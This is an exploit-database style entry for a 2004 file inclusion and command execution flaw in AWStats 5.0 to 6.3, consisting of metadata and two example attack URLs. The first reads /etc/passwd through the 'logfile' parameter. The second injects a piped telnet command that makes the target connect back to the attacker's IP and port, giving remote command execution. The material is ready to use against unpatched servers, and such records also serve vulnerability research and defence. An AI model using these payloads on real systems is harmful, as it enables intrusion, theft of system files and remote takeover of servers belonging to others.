AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution
Author: Johnathan Bat
type: webapps
platform: cgi
port:
date_added: 2004-08-20
date_updated: 2017-11-22
verified: 1
codes: OSVDB-9109
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comawstats-5.0.tgz
Example:
http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd
http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
# milw0rm.com [2004-08-21]